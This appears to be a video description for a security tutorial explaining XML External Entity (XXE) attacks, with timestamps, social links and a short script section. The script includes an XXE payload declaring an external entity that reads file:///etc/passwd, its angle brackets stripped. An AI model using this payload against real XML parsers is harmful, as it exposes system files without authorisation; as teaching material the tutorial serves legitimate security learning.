XXE Attack Explanation

Опубликовано: 16 Июль 2026
на канале: Zuniga Security
192
1

------------------------------TIMESTAMP--------------------------
0:00 Intro
1:10 Lab
4:55 Attack Solutions

-----------------------------------------------------------------------------



XML files can incorporate inline references to other documents. Unsafe treatment of external references allows an attacker to probe your file system for sensitive information - an XML External Entity (XXE) attack.


Leave a like & follow for more video about hacking. Please leave a comment below to help me to show you better content, and don't forget to leave me one of those ;) Have a great day by Zuniga security.

● Buymeacoffee: https://www.buymeacoffee.com/zunigasec
You can find me on:
● MY INSTAGRAM -   / zunigasecur  

● TIKTOK - https://vm.tiktok.com/ZMe2jvf2n/
● TWITTER - https://twitter.com/zunigasecurity?s=09
● FACEBOOK -   / zunigasecurit  


---------------------------USEFUL LINK---------------------------
Take a look here: https://application.security/free/owa...

-----------------------------SCRIPT-------------------------------



!DOCTYPE myFile [
!ELEMENT someEntity ANY
!ENTITY someEntity "Hello guyss"

]

myXmlFile

message&someEntity;/message

/myXmlFile


/////////////////////////



!DOCTYPE myFile [
!ELEMENT fileEntity ANY
!ENTITY fileEntity SYSTEM "file:///etc/passwd"

]

myXmlFile

message&fileEntity;/message

♫ Track: [Electro Swing] ExoNova - Electro Swingity [No Copyright Music]
♫ Watch: https://www.youtube.com/watch?v=GMhoi...